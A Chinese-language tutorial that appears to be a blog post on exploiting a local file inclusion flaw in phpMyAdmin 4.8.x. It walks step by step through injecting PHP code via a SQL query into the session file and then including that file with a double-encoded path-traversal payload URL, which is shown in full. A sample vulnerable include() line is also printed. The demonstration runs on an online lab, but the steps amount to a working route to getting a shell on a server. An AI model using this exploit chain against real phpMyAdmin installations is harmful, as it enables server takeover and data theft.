phpMyAdmin 4.8.x 本地文件包含漏洞利用

phpMyAdmin 4.8.x 本地文件包含漏洞利用

ChaMd5安全團隊公開了一個phpMyAdmin最新版中的本地文件包含漏洞：phpmyadmin4.8.1後臺getshell。該漏洞利用不要求root賬號，只需可以登陸 phpMyAdmin 便可以利用。

這一部分咱們須要先了解一下LFI漏洞（本地文件包含漏洞）

• 典型漏洞代碼： <!–?php include($_GET['pages'].‘.php’); ?–>

主要涉及到的函數有：
include(),require()、include_once(),require_once()
magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、post_max_size()、and max_input_time()等

利用總結見：LFI漏洞利用總結

---

咱們繼續使用VulnSpy的在線 phpMyAdmin 環境來演示該漏洞的利用。
簡而言之phpMyAdmin 4.8.x 本地文件包含漏洞就是經過編碼繞過白名單檢測。而後編者又發現：把WebShell當作數據表的字段值是能夠完美的寫入到數據庫文件當中的！

• 由於原文中包含數據庫文件可能因爲文件權限或者賬號權限不足而沒法利用，這裏咱們將使用另一種方式來利用該文件包含漏洞，即包含session文件。

實踐

1. 跟上一個漏洞同樣，咱們建立完成後進行登陸：
   

2. 點擊頂部導航欄中的SQL按鈕，執行SQL查詢：

select '<?php phpinfo();exit;?>'

1. 獲取本身的SESSION ID
   SESSION ID爲：Cookie 中的 phpMyAdmin 項。
   

這樣對應的SESSION文件爲/var/lib/php/sessions/sess_SESSION ID。

1. 包含SESSION文件，成功利用該漏洞
   

• payload:

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k